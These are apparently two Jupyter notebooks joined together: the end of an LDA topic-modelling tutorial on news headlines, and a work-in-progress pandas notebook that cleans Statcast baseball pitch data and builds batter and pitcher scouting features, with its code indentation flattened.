Topic: 7 Word: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti"
Topic: 8 Word: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon"
Topic: 9 Word: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack"
###Markdown
Classification of the topics As we can see, when using tf-idf, heavier weights are given to words that are not as frequent which results in nouns being factored in. That makes it harder to figure out the categories as nouns can be hard to categorize. This goes to show that the models we apply depend on the type of corpus of text we are dealing with. Using the words in each topic and their corresponding weights, what categories could you find?* 0: * 1: * 2: * 3: * 4: * 5: * 6: * 7: * 8: * 9: Step 5.1: Performance evaluation by classifying sample document using LDA Bag of Words modelWe will check to see where our test document would be classified.
###Code
'''
Text of sample document 4310
'''
processed_docs[4310]
'''
Check which topic our test document belongs to using the LDA Bag of Words model.
'''
document_num = 4310
# Our test document is document number 4310
# TODO
# Our test document is document number 4310
for index, score in sorted(lda_model[bow_corpus[document_num]], key=lambda tup: -1*tup[1]):
print("\nScore: {}\t \nTopic: {}".format(score, lda_model.print_topic(index, 10)))
###Output
Score: 0.553202748298645
Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain" + 0.012*"dead" + 0.012*"drought" + 0.012*"sydney" + 0.012*"price" + 0.010*"fall"
Score: 0.28677472472190857
Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu" + 0.013*"farmer" + 0.012*"busi" + 0.011*"begin" + 0.010*"worker" + 0.010*"threat"
Score: 0.020009001716971397
Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search" + 0.015*"probe" + 0.013*"region" + 0.011*"offic" + 0.011*"bodi" + 0.010*"park"
Score: 0.020004812628030777
Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid" + 0.013*"firefight" + 0.011*"blaze" + 0.010*"rais" + 0.010*"battl" + 0.010*"unit"
Score: 0.0200041513890028
Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost" + 0.017*"urg" + 0.012*"defend" + 0.012*"servic" + 0.012*"health" + 0.012*"rise"
Score: 0.020001856610178947
Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south" + 0.013*"law" + 0.012*"take" + 0.012*"timor" + 0.010*"open" + 0.010*"clash"
Score: 0.020001748576760292
Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death" + 0.016*"coast" + 0.013*"year" + 0.013*"driver" + 0.013*"get" + 0.013*"prompt"
Score: 0.02000090852379799
Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor" + 0.013*"market" + 0.012*"reject" + 0.012*"say" + 0.012*"appeal" + 0.011*"aust"
Score: 0.020000092685222626
Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final" + 0.012*"state" + 0.012*"say" + 0.012*"compani" + 0.010*"nuclear" + 0.009*"join"
Score: 0.020000003278255463
Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder" + 0.021*"accus" + 0.020*"forc" + 0.019*"attack" + 0.016*"case" + 0.013*"trial"
###Markdown
It has the highest probability (`x`) to be part of the topic that we assigned as X, which is the accurate classification. Step 5.2: Performance evaluation by classifying sample document using LDA TF-IDF model
###Code
'''
Check which topic our test document belongs to using the LDA TF-IDF model.
'''
# Our test document is document number 4310
for index, score in sorted(lda_model_tfidf[bow_corpus[document_num]], key=lambda tup: -1*tup[1]):
print("\nScore: {}\t \nTopic: {}".format(score, lda_model_tfidf.print_topic(index, 10)))
###Output
Score: 0.8199763894081116
Topic: 0.015*"water" + 0.011*"drought" + 0.008*"murray" + 0.007*"suppli" + 0.006*"export" + 0.006*"farmer" + 0.006*"recycl" + 0.006*"beach" + 0.006*"legal" + 0.006*"plan"
Score: 0.020008740946650505
Topic: 0.016*"search" + 0.014*"miss" + 0.012*"south" + 0.010*"coast" + 0.010*"east" + 0.009*"die" + 0.008*"gold" + 0.008*"crew" + 0.008*"violenc" + 0.006*"crash"
Score: 0.020004352554678917
Topic: 0.013*"nuclear" + 0.010*"guilti" + 0.009*"prompt" + 0.007*"plead" + 0.007*"korea" + 0.007*"polic" + 0.006*"bail" + 0.006*"refus" + 0.006*"iran" + 0.006*"beatti"
Score: 0.02000252529978752
Topic: 0.027*"closer" + 0.012*"govt" + 0.009*"council" + 0.008*"health" + 0.007*"rise" + 0.007*"plan" + 0.007*"urg" + 0.006*"union" + 0.006*"fund" + 0.006*"opposit"
Score: 0.0200019683688879
Topic: 0.010*"govt" + 0.009*"region" + 0.009*"plan" + 0.009*"rudd" + 0.008*"fund" + 0.008*"indigen" + 0.008*"labor" + 0.007*"council" + 0.007*"shortag" + 0.006*"urg"
Score: 0.020001957193017006
Topic: 0.012*"hick" + 0.011*"firefight" + 0.011*"blaze" + 0.010*"damag" + 0.007*"boat" + 0.007*"costello" + 0.006*"illeg" + 0.006*"alic" + 0.006*"energi" + 0.005*"station"
Score: 0.020001888275146484
Topic: 0.020*"crash" + 0.019*"kill" + 0.019*"polic" + 0.011*"road" + 0.011*"investig" + 0.011*"driver" + 0.009*"fatal" + 0.009*"bomb" + 0.008*"death" + 0.008*"attack"
Score: 0.020001139491796494
Topic: 0.011*"timor" + 0.009*"liber" + 0.009*"iraq" + 0.007*"terror" + 0.006*"howard" + 0.006*"troop" + 0.006*"takeov" + 0.006*"lebanon" + 0.006*"quit" + 0.006*"resign"
Score: 0.020000556483864784
Topic: 0.017*"charg" + 0.015*"murder" + 0.012*"jail" + 0.012*"court" + 0.011*"polic" + 0.010*"face" + 0.010*"stab" + 0.009*"assault" + 0.009*"sentenc" + 0.007*"solomon"
Score: 0.020000483840703964
Topic: 0.010*"england" + 0.009*"tiger" + 0.008*"victori" + 0.008*"climat" + 0.007*"pakistan" + 0.007*"australia" + 0.007*"lead" + 0.006*"world" + 0.006*"iemma" + 0.006*"season"
###Markdown
It has the highest probability (`x%`) to be part of the topic that we assigned as X. Step 6: Testing model on unseen document
###Code
unseen_document = "My favorite sports activities are running and swimming."
# Data preprocessing step for the unseen document
bow_vector = dictionary.doc2bow(preprocess(unseen_document))
for index, score in sorted(lda_model[bow_vector], key=lambda tup: -1*tup[1]):
print("Score: {}\t Topic: {}".format(score, lda_model.print_topic(index, 5)))
###Output
Score: 0.4200000762939453 Topic: 0.022*"closer" + 0.021*"test" + 0.019*"lead" + 0.017*"talk" + 0.014*"south"
Score: 0.2199999839067459 Topic: 0.018*"return" + 0.017*"hold" + 0.014*"question" + 0.014*"work" + 0.013*"resid"
Score: 0.2199920117855072 Topic: 0.040*"charg" + 0.035*"court" + 0.033*"face" + 0.022*"kill" + 0.021*"murder"
Score: 0.020004048943519592 Topic: 0.038*"crash" + 0.025*"jail" + 0.021*"road" + 0.017*"die" + 0.017*"death"
Score: 0.02000385895371437 Topic: 0.036*"report" + 0.024*"opposit" + 0.023*"power" + 0.014*"win" + 0.013*"final"
Score: 0.019999999552965164 Topic: 0.092*"polic" + 0.028*"seek" + 0.025*"investig" + 0.022*"miss" + 0.015*"search"
Score: 0.019999999552965164 Topic: 0.016*"record" + 0.014*"break" + 0.014*"australia" + 0.013*"look" + 0.012*"rain"
Score: 0.019999999552965164 Topic: 0.050*"water" + 0.032*"warn" + 0.019*"urg" + 0.015*"industri" + 0.014*"continu"
Score: 0.019999999552965164 Topic: 0.016*"elect" + 0.016*"iraq" + 0.014*"howard" + 0.013*"deal" + 0.013*"labor"
Score: 0.019999999552965164 Topic: 0.057*"govt" + 0.029*"council" + 0.024*"fund" + 0.023*"plan" + 0.017*"boost"
|
Work in progress/cleaning_workbook.ipynb | ###Markdown
Import Install Packages Import Packages
###Code
import pandas as pd
import numpy as np
import random
###Output
_____no_output_____
###Markdown
Import Data
###Code
filenames = [str(i) + '.pkl' for i in range(2010,2019)]
seasons = ['df_' + str(i) for i in range(10,19)]
season_dataframes = {}
for i in list(zip(filenames, seasons)):
path = "Season_pickles/" + i[0]
season_dataframes[i[1]] = pd.read_pickle(path, compression='zip')
###Output
_____no_output_____
###Markdown
Concatenate Data
###Code
pitches = pd.concat(season_dataframes.values())
###Output
_____no_output_____
###Markdown
Clean All Instances **Issue**: There are some instances where no data is recorded**Solution**: Drop these instances from the data
###Code
pitches = pitches.dropna(axis = 0, how = 'all')
###Output
_____no_output_____
###Markdown
--- Pitch Type **Feature Name**: `pitch_type`**Feature Description**: The type of pitch derived from Statcast. **Issue**: Feature is supposed to contain a 2 character string, but many values (265) are filled with long strings of numerical characters. Example: 160421_181540**Solution**: Replace values longer than 2 characters in lengeth with np.NaN
###Code
pitches['pitch_type'] = pitches.apply(
lambda row: np.NaN\
if len(str(row['pitch_type'])) > 2\
else row['pitch_type'], axis = 1)
###Output
_____no_output_____
###Markdown
**Issue**: Many values of this feature are recorded as 'UN'**Solution**: Replace value with np.NaN
###Code
pitches['pitch_type'] = pitches['pitch_type'].replace({'UN':np.nan})
###Output
_____no_output_____
###Markdown
**Issue**: The pitch type feature is filled with NaN values**Solution**: We will create a mapping of a pitchers id and his normalized pitch counts. Using these normalized values as weights we will select a random pitch type and fill the NaN value for that pitcher. We will use df.apply, but this could be time optomized by using series vectorization.
###Code
# Create mapping
# List fo unique pitcher ID's
pitcher_list = pitches['pitcher'].unique().tolist()
pitcher_dict = {}
for pitcher in pitcher_list:
# Pitcher's prior pitch type probabilites
pitch_type_weights = pitches[pitches.pitcher == pitcher]\
.pitch_type\
.value_counts(normalize=True)
pitcher_dict[pitcher] = pitch_type_weights.to_dict()
# Fill nan values
pitcher_dict = pd.DataFrame(pitcher_dict).fillna(0).to_dict()
# Select replacement pitch type and fill NaN values
def pick_a_pitch(pitcher_id):
"""
Returns a random pitch type label
Uses pitchers prior pitch type probabilites as weights
"""
population = list(pitcher_dict[pitcher_id].keys())
weights = list(pitcher_dict[pitcher_id].values())
return random.choices(population, weights, k=1)[0]
# Iterate by instance, fill null values
pitches['pitch_type'] = pitches.apply(
lambda row: pick_a_pitch(row['pitcher']) \
if pd.isnull(row['pitch_type']) \
else row['pitch_type'], axis = 1)
pitch_type_map = {'FA':'fastball', 'FF':'fastball', 'FT':'fastball', 'FC':'fastball',
'FS':'fastball', 'SI':'fastball', 'SF':'fastball', 'SL':'breaking',
'CB':'breaking', 'CU':'breaking', 'SC':'breaking', 'KC':'breaking',
'CH':'offspeed', 'KN':'offspeed', 'EP':'offspeed', 'FO':'breaking',
'PO':'pitchout', 'IN':'pitchout'}
pitches['pitch_subtype'] = pitches['pitch_type']
pitches['pitch_type'] = pitches['pitch_type'].map(pitch_type_map)
###Output
_____no_output_____
###Markdown
--- Count **Feature**: Count ratio**Description**: The ratio of balls and strikes for the current at bat **Issue**: There are two existing features related to the count. We need to represent the count as a categorical feature.**Solution**: Classifiy the pitchers position reguarding the count (Ahead, Behind, Neutral)
###Code
pitches['balls'] = pitches['balls'].replace({4:3, 5:3})
pitches['count_status'] = pitches['balls'].astype('int').astype('str')\
+ pitches['strikes'].astype('int').astype('str')
count_status_mapping = {
'00':'neutral', '21':'neutral', '32':'neutral', '10':'behind',
'20':'behind', '30':'behind', '31':'behind', '01':'ahead',
'02':'ahead', '11':'ahead', '12':'ahead', '22':'ahead'
}
pitches['count_status'] = pitches['count_status'].map(count_status_mapping)
###Output
_____no_output_____
###Markdown
--- Score Differential **Feature**: Score Differential**Description**: The absolute value of the difference in home team score and away team score
###Code
pitches['score_differential'] = abs(pitches['home_score'] - pitches['away_score'])
###Output
_____no_output_____
###Markdown
--- Bases Loaded **Feature**: Bases Loaded**Description**: A binary indication of the bases being loaded or not
###Code
pitches['on_1b'] = pitches['on_1b'] * 0 + 1
pitches['on_1b'] = pitches['on_1b'].fillna(0)
pitches['on_2b'] = pitches['on_2b'] * 0 + 1
pitches['on_2b'] = pitches['on_2b'].fillna(0)
pitches['on_3b'] = pitches['on_3b'] * 0 + 1
pitches['on_3b'] = pitches['on_3b'].fillna(0)
pitches['bases_loaded'] = pitches['on_1b'] + pitches['on_2b'] + pitches['on_3b']
pitches['bases_loaded'] = pitches['bases_loaded'].apply(lambda x: 1 if x == 3 else 0)
###Output
_____no_output_____
###Markdown
--- Swung **Feature**: swung**Description**: Binary feature describing wheather or not the batter swung at the pitch or not
###Code
swung = ['foul','hit_into_play','swinging_strike','hit_into_play_no_out',
'hit_into_play_score','foul_tip','swinging_strike_blocked',
'foul_bunt','missed_bunt']
pitches['batter_swung'] = pitches['description'].apply(lambda x: 1 if x in swung else 0)
pitches['ball_high'] = pitches['plate_z'] > pitches['sz_top']
pitches['ball_low'] = pitches['plate_z'] < pitches['sz_bot']
pitches['ball_left'] = pitches['plate_x'].apply(lambda x: x < -0.73)
pitches['ball_right'] = pitches['plate_x'].apply(lambda x: x > 0.73)
pitches['in_strikezone'] = (pitches['ball_high'].astype(int)
+ pitches['ball_low'].astype(int)
+ pitches['ball_left'].astype(int)
+ pitches['ball_right'].astype(int))
pitches['in_strikezone'] = pitches['in_strikezone'].apply(
lambda x: 0
if x > 0
else 1)
pitches['chased'] = pitches['batter_swung'] - pitches['in_strikezone']
pitches['chased'] = pitches['chased'].apply(lambda x: 1 if x == 1 else 0)
###Output
_____no_output_____
###Markdown
Batters Data
###Code
sample_batter = list(pitches['batter'].unique())[0]
sample_batter
batter_df = pitches[pitches['batter'] == sample_batter]
batter_df.head()
next_probs = batter_df.groupby('pitch_type').size().div(len(batter_df))
next_probs
batter_df['pitch_type'].value_counts(normalize = True).to_dict()
pd.DataFrame(batter_df.groupby(['pitch_type', 'chased']).size().div(len(batter_df)).div(next_probs, axis=0, level='pitch_type'))
batter_dict = {}
pitch_types = pitches['pitch_type'].unique().tolist()
pitch_type_percentages = batter_df['pitch_type'].value_counts(normalize=True)
for pitch_type in pitch_types:
batter_dict[pitch_type + '_perc_faced'] = pitch_type_percentages[pitch_type] * 100
batter_dict
for pitch_type in pitch_types:
cat_df = batter_df[batter_df['pitch_type'] == pitch_type]
out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum()
chased_count = cat_df['chased'].sum()
chase_perc = (chased_count / out_of_strikezone) * 100
batter_dict[pitch_type + '_chase_perc'] = chase_perc
ball_in_play_count = len(cat_df[cat_df['type'] == 'X'])
swung_count = cat_df['batter_swung'].sum()
batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
batter_dict
for pitch_type in pitch_types:
ball_in_play_count = len(cat_df[cat_df['type'] == 'X'])
swung_count = cat_df['batter_swung'].sum()
batter_dict[pitch_type + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
#calc ball in play % for each swing for each pitch cat:
ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play
swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column
#assign the ball in play % per swing to the batter dict
batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
def make_batters_df(prior_df):
df = prior_df.copy()
#make list of the unique batter ids
batters = list(df['batter'].unique())
#initialize empty dictionary to store the batter stats
batters_dict = {}
#set a break flag to False for error-checking
brk = False
#iterate thru each unique batter
for batter in batters:
if brk:
break
#make subset of the df for that batter and assign to variable batter_df
batter_df = df[df['batter'] == batter]
#assign all pitch categories to list:
all_pitch_cats = ['fastball', 'breaking', 'offspeed', 'pitchout']
#assign the pitch categories to a list
try:
pitch_cats = batter_df['pitch_type'].unique().tolist()
except KeyError:
print(batter)
brk = True
#get the normalized value counts of pitches by category that batter has faced
vc = batter_df['pitch_type'].value_counts(normalize=True)
#initialize empty dict for each batter
batter_dict = {}
#if there are any pitch categories the batter has not faced,
unfaced_cats = list(set(all_pitch_cats) - set(pitch_cats))
for cat in pitch_cats:
if brk:
break
#assign the % of pitches faced by the batter for that category to his batter dict
try:
batter_dict[cat + '_perc_faced'] = vc[cat] * 100
except TypeError:
print(batter)
return 1
#continue out of the loop for pitchout category since ball in play stats are NaN
if cat == 'pitchout':
continue
#grab subset of batter df for the pitch category
cat_df = batter_df[batter_df['pitch_type'] == cat]
#if he has faced less than 100 pitches of that type, add it to unfaced_category and fill w NaN
if len(cat_df) < 100:
unfaced_cats.append(cat)
continue
#calculate batters chase % for pitch type category on balls outside the strikezone
out_of_strikezone = len(cat_df) - cat_df['in_strikezone'].sum() #num of times ball was out of zone
chased_count = cat_df['chased'].sum() #num of times batter chased
try:
chase_perc = (chased_count / out_of_strikezone) * 100
except ZeroDivisionError:
chase_perc = np.nan
#assign the chase perc to the batter dict
batter_dict[cat + '_chase_perc'] = chase_perc
#calc ball in play % for each swing for each pitch cat:
ball_in_play_count = len(cat_df[cat_df['type'] == 'X']) #type X means ball hit into play
swung_count = cat_df['batter_swung'].sum() #counts all the 1s in the swung column
#assign the ball in play % per swing to the batter dict
batter_dict[cat + '_bip_swung_perc'] = (ball_in_play_count / swung_count) * 100
#calculate taken strike %
taken_strike_count = len(cat_df[(cat_df['in_strikezone'] == 1) & (cat_df['batter_swung'] == 0)])
pitches_in_zone_count = cat_df['in_strikezone'].sum() #counts the 1s in the in zone col
#assign to batter_dict
batter_dict[cat + '_taken_strike_perc'] = (taken_strike_count / pitches_in_zone_count) * 100
#for each pitch type category, get the batters stats on balls hit in play
stats = ['estimated_woba_using_speedangle', 'babip_value', 'iso_value']
for stat in stats:
#drop Nans from the stat column and assign to new subset, for each stat
stat_cat_df = cat_df.dropna(subset=[stat])
if stat == 'estimated_woba_using_speedangle':
#get the mean avg_est_woba
avg_est_woba = stat_cat_df['estimated_woba_using_speedangle'].mean()
#assign that value to the batters dictionary
batter_dict[cat + '_est_woba'] = avg_est_woba
if avg_est_woba == np.nan:
print(batter)
brk = True
break
elif stat == 'babip_value':
avg_babip = stat_cat_df['babip_value'].mean()
batter_dict[cat + '_babip'] = avg_babip
else:
avg_iso_value = stat_cat_df['iso_value'].mean()
batter_dict[cat + '_iso_value'] = avg_iso_value
#for unfaced or small sample pitch_types: assign NaNs to his dictionary for that category
for cat in unfaced_cats:
if cat == 'pitchout':
batter_dict[cat + '_perc_faced'] = 0
else:
batter_dict[cat + '_perc_faced'] = np.nan
batter_dict[cat + '_chase_perc'] = np.nan
batter_dict[cat + '_bip_swung_perc'] = np.nan
batter_dict[cat + '_taken_strike_perc'] = np.nan
batter_dict[cat + '_est_woba'] = np.nan
batter_dict[cat + '_babip'] = np.nan
batter_dict[cat + '_iso_value'] = np.nan
#assign the batter dictionary to the main dictionary of all batters
batters_dict[batter] = batter_dict
if not brk:
print('iteration completed successfully')
#make df from the batters dict
batters_df = pd.DataFrame.from_dict(batters_dict, orient='index')
batters_df = batters_df.reset_index().rename(columns={'index':'batter'})
return batters_df
batters_df = make_batters_df(pitches)
batters_df.head()
def downcast_dtypes(df):
df = df.copy()
int_cols = df.select_dtypes('int').columns.tolist()
float_cols = df.select_dtypes('float').columns.tolist()
obj_cols = df.select_dtypes('object').columns.tolist()
cat_cols = []
for col in obj_cols:
if col == 'pitch_type':
continue
if len(df[col].unique()) < len(df)/2:
cat_cols.append(col)
ints = df[int_cols].apply(pd.to_numeric,downcast='unsigned')
floats = df[float_cols].apply(pd.to_numeric,downcast='float')
cats = df[cat_cols].astype('category')
df = df.drop(columns=int_cols + float_cols + cat_cols)
for d in [ints, floats, cats]:
df = pd.concat([df, d], axis=1)
return df
def pre_process_step1(combined):
df = combined.copy()
#convert the pitch type for UN (unknown) to np.nan
df['pitch_type'] = df['pitch_type'].replace({'UN':np.nan})
#fix some faulty data that has number of balls listed as 4:
df['balls'] = df['balls'].replace({4.0: 3.0})
#count, count_cat, score_diff, on_base 1/0, bases_loaded
df = make_game_features(df)
#batter_swung, in_strikezone, chased
df = make_strikezone_swung_and_chase_features(df)
#get aggregate pitcher %s dict from prior data:
pitcher_dict = gen_pitcher_percentages(df)
#fil the NaNs for pitch_type using randomized guess from pitcher tendencies
df = fill_pitch_type_nans(df, pitcher_dict)
#pitch_type category feature
df = make_pitch_type_cat(df)
return df
#pass in list of periods to update the data (and fill NaNs) using prior aggregates:
def pre_process_step2(pre_processed_step1, start_dates, end_dates):
df = pre_processed_step1.copy()
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#add the batter scouting report
batters_df = make_batters_df(prior_df)
current_df = pd.merge(current_df, batters_df, how='left', on='batter')
#append the df to the list
df_list.append(current_df)
step2_df = pd.concat(df_list, sort=False)
return step2_df
def get_pitch_tendencies(pitcher_df):
#assign the normalized value counts for this pitchers pitch types to a dictionary
pitcher_tendencies_overall = pitcher_df['pitch_type'].value_counts(normalize=True).to_dict()
#initialize empty dict for count categories tendencies
pitcher_tendencies_by_count = {}
#loop over each count category and get the pitchers tendencies and add to the dict
for cat in pitcher_df['count_cat'].unique().tolist():
subset = pitcher_df[pitcher_df['count_cat'] == cat]
pitcher_tendencies_by_count[cat] = subset['pitch_type'].value_counts(normalize=True).to_dict()
return pitcher_tendencies_overall, pitcher_tendencies_by_count
def make_tendency_features(pitcher_df, pitcher_tendencies_overall, pitcher_tendencies_by_count):
df = pitcher_df.copy()
pitch_types = pitcher_tendencies_overall.keys()
for pitch_type in pitch_types:
overall_feature = 'overall_' + pitch_type + '_perc'
count_cat_feature = 'count_cat_' + pitch_type + '_perc'
def get_overall_perc(x):
return pitcher_tendencies_overall[x]
def get_by_count_perc(x):
try:
return pitcher_tendencies_by_count[x][pitch_type]
except KeyError:
return 0
df[overall_feature] = pitch_type
df[overall_feature] = df[overall_feature].apply(get_overall_perc)
df[count_cat_feature] = df['count_cat'].apply(get_by_count_perc)
return df
start_dates = ['2018-03-29', '2018-05-01', '2018-06-01', '2018-07-01', '2018-08-01',
'2018-09-01', '2019-03-28', '2019-05-01', '2019-06-01', '2019-07-01',
'2019-08-01']
end_dates = ['2018-04-30', '2018-05-31', '2018-06-30', '2018-07-31', '2018-08-31',
'2018-10-01', '2019-04-30', '2019-05-31', '2019-06-30', '2019-07-31',
'2019-08-31']
def add_pitcher_scouting_report(pitcher_df, pitcher_df17, start_dates, end_dates):
df = pd.concat([pitcher_df, pitcher_df17], sort=False)
#initialize empty list to store dfs (concat them together later)
df_list = []
#iterate over each period
for i in range(len(start_dates)):
#make the prior and current dfs:
prior_df = df[df['game_date'] < start_dates[i]]
current_df = df[(df['game_date'] >= start_dates[i]) & (df['game_date'] <= end_dates[i])]
#get the pitch tendencies from prior:
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(prior_df)
#make the pitch tendencies features on current:
current_df = make_tendency_features(current_df, pitcher_tendencies_overall, pitcher_tendencies_by_count)
#append the df to the list
df_list.append(current_df)
df = pd.concat(df_list, sort=False)
return df
def make_game_batting_order(game_df):
game_df = game_df.sort_values(by=['at_bat_number', 'pitch_number'])
all_batters = game_df['batter'].unique().tolist()
#re-set the at_bat_number for the game to be sequential starting at 1
at_bat_keys = game_df['at_bat_number'].unique().tolist()
at_bat_values = range(1, len(at_bat_keys)+1)
at_bat_map = dict(zip(at_bat_keys, at_bat_values))
game_df['at_bat_number'] = game_df['at_bat_number'].replace(at_bat_map)
#get the first 9 batter ids
first_9_batter_subset = game_df[game_df['at_bat_number'] < 10]
first_9_batters = first_9_batter_subset['batter'].unique().tolist()
#map the batter id to batting order position 1-9
batting_order_map = dict(zip(first_9_batters, range(1,10)))
#for anyone else who bats later in the game, assign 'PH' (pinch hitter) to their batting order slot
other_batters = list(set(all_batters) - set(first_9_batters))
if len(other_batters) > 0:
for batter in other_batters:
batting_order_map[batter] = 'PH'
try:
game_df['batting_order_slot'] = game_df['batter'].apply(lambda x: batting_order_map[x])
except KeyError:
game_df = None
return game_df
game_df['pitcher_AB'] = game_df['batter'].apply(lambda x: True if x in pitcher_list else False)
game_df['batting_order_slot'] = game_df['batting_order_slot'].where(game_df['pitcher_AB'] == False, other='pitcher')
return game_df
def make_game_pitchcount_and_trailing_pitch_features(pitcher_df, pitcher_list):
df = pitcher_df.copy()
print('#pitches in df before: ' + str(len(df)))
pitcher_tendencies_overall, pitcher_tendencies_by_count = get_pitch_tendencies(df)
games = df['game_pk'].unique().tolist()
#take the first game and make the pitch count feature
first_game_df = df[df['game_pk'] == games[0]].copy()
first_game_df['pitch_count'] = range(1, first_game_df.shape[0] + 1)
#make the L1_pitch type feature:
first_game_df['L1_pitch_type'] = first_game_df['pitch_type'].shift(periods=1)
first_game_df['L1_pitch_result'] = first_game_df['type'].shift(periods=1)
first_game_df['L1_pitch_result'] = first_game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
first_game_df['L1_pitch_zone'] = first_game_df['zone'].shift(periods=1)
first_game_df['L1_pitch_zone'] = first_game_df['L1_pitch_zone'].fillna(-1)
#overall strike % (to fill in for first 5 pitches L5_strike_perc)
overall_strike_perc = df['type'].value_counts(normalize=True)['S'] * 100
#make the trailing 5 pitches:
for index, row in first_game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
first_game_df.at[index, 'L1_pitch_type'] = random_pitch
#for the first 5 rows, use overall pitcher tendencies
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
first_game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
first_game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
else:
current_pitch = first_game_df.at[index, 'pitch_count']
#make a subset of the prev 5 pitches
subset = first_game_df[(first_game_df['pitch_count'] > current_pitch - 6) & (first_game_df['pitch_count'] < current_pitch)]
#grab the value count percentages for the last 5 pitches
subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
first_game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
#iterate over all possible pitch types this pitcher throws:
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
#if he has thrown that pitch type in last 5
try:
first_game_df.at[index, feature] = subset_percentages[pitch] * 100
#except for when he hasnt thrown that type in last 5
except:
first_game_df.at[index, feature] = 0
#apply the battting order features to the game:
first_game_df = make_game_batting_order(first_game_df)
#iterate the same process for the rest of his games:
for game in games[1:]:
game_df = df[df['game_pk'] == game].copy() #get df for that game only
game_df['pitch_count'] = range(1, game_df.shape[0] + 1) #make the pitch count for the game
game_df['L1_pitch_type'] = game_df['pitch_type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['type'].shift(periods=1)
game_df['L1_pitch_result'] = game_df['L1_pitch_result'].replace({np.nan:'first pitch'})
game_df['L1_pitch_zone'] = game_df['zone'].shift(periods=1)
game_df['L1_pitch_zone'] = game_df['L1_pitch_zone'].fillna(0)
#make the trailing 5 pitches:
for index, row in game_df.iterrows():
#fill NaNs for L1_pitch using same method as when pitch_type was missing
if row['pitch_count'] == 1:
random_pitch = random.choices(population=list(pitcher_tendencies_overall.keys()),
weights=list(pitcher_tendencies_overall.values()),
k=1)[0]
game_df.at[index, 'L1_pitch_type'] = random_pitch
if row['pitch_count'] < 6:
#fill with overall tendencies
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
game_df.at[index, feature] = pitcher_tendencies_overall[pitch] * 100
#strike %
game_df.at[index, 'L5_strike_perc'] = overall_strike_perc
else:
current_pitch = game_df.at[index, 'pitch_count']
subset = game_df[(game_df['pitch_count'] > current_pitch - 6) & (game_df['pitch_count'] < current_pitch)]
subset_percentages = subset['pitch_type'].value_counts(normalize=True).to_dict()
try:
L5_strike_perc = subset['type'].value_counts(normalize=True)['S'] * 100
except KeyError:
L5_strike_perc = 0
game_df.at[index, 'L5_strike_perc'] = L5_strike_perc
for pitch in list(pitcher_tendencies_overall.keys()):
feature = 'L5_' + pitch + '_perc'
try:
game_df.at[index, feature] = subset_percentages[pitch] * 100
except:
game_df.at[index, feature] = 0
#apply the battting order features to the game:
game_df = make_game_batting_order(game_df)
if game_df.empty:
print('skipping game because of bat data: ' + str(game))
continue
#concatenate that game w/ updated pitch count and trailing pitches w/ prev games
if game_df['game_pk'].values[0] == games[1]:
new_df = pd.concat([first_game_df, game_df]) #concat the game_df w/ the first game
else:
new_df = pd.concat([new_df, game_df]) #concat the game_df w/ the previous games
print('# pitches in df after: ' + str(len(new_df)))
return new_df
batter_cols = ['fastball_perc_faced','fastball_chase_perc','fastball_bip_swung_perc', 'fastball_taken_strike_perc',
'fastball_est_woba', 'fastball_babip', 'fastball_iso_value', 'breaking_perc_faced', 'breaking_chase_perc',
'breaking_bip_swung_perc', 'breaking_taken_strike_perc', 'breaking_est_woba', 'breaking_babip',
'breaking_iso_value', 'offspeed_perc_faced', 'offspeed_chase_perc', 'offspeed_bip_swung_perc',
'offspeed_taken_strike_perc', 'offspeed_est_woba', 'offspeed_babip', 'offspeed_iso_value',
